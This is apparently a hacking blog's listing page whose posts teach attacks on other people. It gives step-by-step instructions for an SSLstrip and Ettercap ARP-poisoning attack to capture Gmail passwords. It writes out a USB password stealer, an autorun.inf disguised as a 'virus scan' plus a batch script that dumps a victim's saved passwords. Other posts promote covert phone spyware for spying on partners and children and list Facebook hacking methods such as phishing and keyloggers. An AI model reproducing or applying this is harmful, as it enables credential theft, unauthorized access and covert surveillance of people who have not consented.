Showing posts with label Hacking Softwares. Show all posts
Showing posts with label Hacking Softwares. Show all posts

Man In The Middle Attack - SSL Hacking

One of the most successful way of gaining information such as passwords,user ids etc in LAN (local area network) is through man in the middle attacks . I will not be going to deep into Man in the middle attacks, but in simple words it can be explained as attacker or a hacker listening to all the information sent in between the client and the server .To prevent these kind of attacks Email providers started using Hypertext Transfer Protocol Secure (HTTPS) It is a combination of the Hypertext Transfer Protocol(HTTP) with SSL (Secure socket layer )protocol to provide encrypted communication between the client and the server .So when a hacker caries out a Mimt attack the victim is cautioned with a invalid SSL Certificate

In this tutorial I will teach how to carry out a successful Mitm attack 

Concept :-

We Know that HTTP (Hypertext Transfer Protocol )simply sends all the information through plain text .So if we make the victim use HTTP instead of HTTPS to connect sites like Gmail , Pay pal. we will be able to carry out a successful Mitm attack with out causing any suspicion To do this we are going to use a tool called SSL strip

Read More: What is SSL(Secure Socket Layer) 

Thing we Need 

1. SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial 

2. Ettercap to carry out mitm attacks

Demonstration :- 

1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok


2. Now select the victim’s IP and click open 


3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok 


4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2


5. Now select mitm-arp poisoning and click ok as shown



6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTPand not HTTPS Hence we are able to get the User id ,passwords as shown below



Counter measures: 

1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS 

2. Always check the SSL certificate before doing an online transaction

Usb Password Stealer

Usb password stealer
As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords.

Things you will need?

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:


Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc


IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.

Protected storage pass viewer(PSPV) -  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.


Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.


Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

Note:Kindly disable your antivirus before performing these steps


1.First of all download all 5 tools and copy the executables (.exe( files in your USB  i.e. Copy the files  mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.



2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from


New Text Document.txt to autorun.inf


Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.


start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt


save the Notepad and rename it from


New Text Document.txt to launch.bat


Copy the launch.bat file also to your USB drive.


Now your USB Password stealer is ready all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.
Usb password stealer
After this you can see saved password in .TXT files

Spy Phone Gold

Cellphone spy

Want to catch your cheating spouse or girlfriend?Wanna know what your kids are doing on their Cellphone? Want to secretly record SMS,Phone calls,GPRS locations?If you want to do all above things then Spy Phone Gold is the solution for you,Spy Phone Gold is Complete Invisible mobile Phone spying software,through Spy phone Gold you can secretly record Sms,listen to live phone calls in other manner control a Cellphone

Spy Phone GOLD (Click on the link to visit Spy-Era Homepage)

How it works?

The working of Spy Phone GOLD is very simple and needs no extra knowledge to install and use.

Step 1- After you purchase Spy Phone GOLD, you can directly download the spy software onto the target cell phone and installation takes only a few minutes (Approx. 10 Min). No More physical access to cell phone is required after installation!

Step 2- After installation, SPY Phone secretly records events that happen on the target phone and delivers this information to a web account, where you can view these reports 24×7 from any Internet enabled computer or mobile phone.

Compatibility:
Spy Phone is fully compatible with the following mobile phones
BlackBerry Phones
Android Phones
Apple iPhones
Windows Mobile Phones
Symbian OS 9.x and 8.x phones

Click Here for the Complete List of Compatible Phones.

Spy Phone Gold Features:


Following are the features of SpyPhone Gold:

Call Interception (Listen to Phone Call)
Environment Listening ( Bugging Device)
SMS Logging (Incoming / Outgoing)
Call History (Incoming / Outgoing)
Call Duration (Incoming / Outgoing)
GPS and Cell ID Location Tracking
Email Logging (Incoming / Outgoing)
Contact Name in Address Book Linked to each call/sms
SIM Change SMS Notification
Software Based Solution
Search and Download All Records
More

Awards:
Spyphone Gold has received awards from following sites:
Cellphonespy


I recently made a review on Mobile spy,now you might be confused which one is the best,after testing this software personally i think Spyphone Gold is the Best Cellphone spy software,So what are you waiting for order Spy phone gold now.

How to spy a Cell Phone

 Every day I get a lot of emails from people asking how to spy on cell Phone or How to hack a cellphone. To spy on a given cell phone all you need to do is install a good cell phone spy software on the target cell phone and once you do this you can silently record every SMS and information about each call. You can also see GPS positions every thirty minutes.


Why Mobile Spy?
There exists many cell phone spy softwares on the market and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy software's and based on the results we conclude Mobile Spy as be the best one. 



Here is an overview of the entire process:

Mobile Spy is a hybrid software/service which allows you to monitor your smartphone in real time. This unique system records the activities of anyone who uses your compatible iPhone,BlackBerry, Android, Windows Mobile or Symbian OS smartphone. You install a small application onto your Phone. It starts at every boot of your phone but remains stealth and does not show up in the running process list.


After the software is setup on your phone it will record an array of phone activities and then silently upload the data to your private Mobile Spy account using the Internet. When you want to view results, simply login to the Online Control Panel from any computer and enter your username and password to proceed.


Mobile Spy Features:


This powerful system gives you the ability to spy a cellphone and to monitor activities online in real time. Your logs are safely stored in your https-SECURED Mobile Spy account which is accessible only by you from any web browser using a username and password you create.


You can login anytime from any location to view results without needing access to the phone. The activities recorded are each described below. All activities include a date/time stamp and are searchable by phone number. All logs can be easily exported to CSV for importing to your database!


Calls Log


Each incoming and outgoing number is logged along with duration and time stamp.


SMS (Text Messages) Log


Every text message is logged even if the phone's logs are deleted. Includes full text.


GPS Locations Log


The device's current location is frequently logged using GPRS when signal available.


Web Site URLs Log


Each address visited in browser is logged. This feature is currently for iPhones only.


Log Summary


A summary of all activities can be shown along with separate viewers for each type.
The working of  Mobile Spy is very simple and needs no extra knowledge to install and use.

Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for you online control panel.

Step 2- Install the downloaded cell phone spy software onto the target cell phone that you want to spy on. After the installation, spy software starts recording all the activities on the cell phone.

Step 3- Login to your online control panel to see the logs containing the recorded information.
Mobile Spy is fully compatible with the following cell phones
  1. BlackBerry Phones
  2. Android Phones
  3. Apple iPhones
  4. Windows Mobile Phones
  5. Symbian OS 9.x and 8.x phones


Click Here for the Complete List of Compatible Phones. For more info on this product visit the Mobile Spy homepage with the link below
Mobile Spy Homepage

4 Steps to Hack Facebook Password

In my previous post How to hack facebook password i told you about hacking facebook with phishing,Today i thought to uncover all the methods used to hack facebook password,

I will cover 4 methods over here:

1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack

Facebook phishing:
I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article How to hack facebook password

Keylogging:

This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password. I have posted detailed information of top keyloggers in the trade for more information see my password hacking softwares section

3. Social engineering:

This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on Facebook and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.

4.Primary email address hack 
 

Backlinks

Followers

Visitors stats

Support : Softwares And Tips | Best PTC Sites | Free Premium Accounts
Copyright © 2013. Softwares And Tips - All Rights Reserved
Template Modify by Best PTC Sites
Proudly powered by Blogger